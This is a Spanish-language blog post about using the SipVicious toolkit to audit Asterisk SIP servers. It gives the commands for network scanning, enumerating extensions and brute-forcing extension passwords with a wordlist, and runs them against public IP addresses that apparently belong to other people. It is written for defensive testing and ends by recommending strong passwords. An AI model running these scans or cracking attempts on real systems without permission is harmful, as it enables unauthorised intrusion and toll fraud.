Enviado por admin el
SipVicious es una utilidad que podemos usar para probar si la configuración SIP de nuestro servidor Asterisk es segura. Se compone de cuatro programas, escritos en lenguaje Python:
- svmap: Escanea una dirección IP o una serie de direcciones IP para averiguar si hay dispositivos SIP
- svwar: Escanea una centralita PBX buscando el numero de extensiones presentes y si están protegidas con contraseña
- svcrack: Intenta obtener la contraseña de una extensión SIP en un servidor PBX
- svreport: Genera reportes de diferente tipo
Primero tenemos que instalar Python
yum install python
luego descargamos el programa
cd /tmp
wget http://sipvicious.googlecode.com/files/sipvicious-0.2.4.tar.gz
lo descomprimimos
tar -xf sipvicious-0.2.4.tar.gz
entramos en la carpeta
cd sipvicious-0.2.4
y empezamos a hacer nuestras pruebas. La verdad me quedé asombrado por la cantidad de servidores PBX que hay en la red
./svmap.py 67.18.186.202
| SIP Device | User Agent | Fingerprint |
----------------------------------------------------------------------------------------
| 67.18.186.202:5060 | X-Lite | Asterisk / Linksys/PAP2T-3.1.15(LS) / Asterisk PBX |
para un solo IP
./svmap.py 67.18.186.1-67.18.186.255
| SIP Device | User Agent | Fingerprint |
------------------------------------------------------------------------------------------
| 67.18.186.67:5060 | Asterisk PBX | Asterisk / Linksys/PAP2T-3.1.15(LS) |
| 67.18.186.202:5060 | X-Lite | Asterisk / Linksys/PAP2T-3.1.15(LS) / Asterisk PBX |
| 67.18.186.128:5060 | Asterisk PBX | Asterisk / Linksys/PAP2T-3.1.15(LS) |
para una serie de direcciones IP
Una vez que tengamos la lista podemos buscar las extensiones
./svwar.py 67.18.186.128
| Extension | Authentication |
------------------------------
| 120 | reqauth |
| 102 | reqauth |
| 103 | reqauth |
| 100 | reqauth |
| 101 | reqauth |
| 104 | reqauth |
En ese servidor hay configuradas por lo menos 6 extensiones SIP y cada una requiere una contraseña para conectarse. Digo por lo menos porque si arrancamos svwar sin ninguna opción, éste busca solamente extensiones que van desde 1 hasta 999
Si queremos buscar extensiones distintas tenemos que especificarlo en la línea del comando
./svwar.py -e1000-2000 67.18.186.128
con la opción -e1000-2000 el programa buscará en el servidor especificado extensiones que van desde 1000 hasta 2000
con svcrack intentamos hallar la clave de una extensión especifica. Aquí van dos diferentes formas de usarlo:
/svcrack.py -u 100 67.18.186.128
intentará hallar la contraseña de la extensión 100 en la IP especificada. En este modo, sin más opciones, usará como contraseña los números de 1 a 999
para pasarle una lista de contraseñas podemos crear un archivo de texto y poner una contraseña por línea. Ejemplo
nano pass.txt
escribimos una serie de contraseñas (una por línea)
fulano
sutano
etc...
guardamos el archivo
y volvemos a swcrack
./svcrack.py -u100 -d pass.txt 67.18.186.128
Para terminar tenemos la posibilidad de crear reportes de las actividades.
./svmap.py 79.10.100.1-79.10.100.255 -s scan1
con la opción -s scan1 guardamos la sesión con el nombre scan1
luego podemos crear el reporte
./svreport.py export -f txt -o scan1.txt -s scan1
para crear el reporte en pdf visiten esta pagina
Todos los comandos tienes un ayuda en linea.
./svmap.py --help
Para más información hagan referencia a la pagina de los desarrolladores.
Mi juicio personal, es que una cosa es encontrar los servidores SIP y otra "robarse" las contrasenas de las extensiones. Si Tenemos nuestro archivo sip.conf bien configurado y usamos contrasenas alfanumericas, podemos dormir tranquilos.
Que opinan?
Comentarios recientes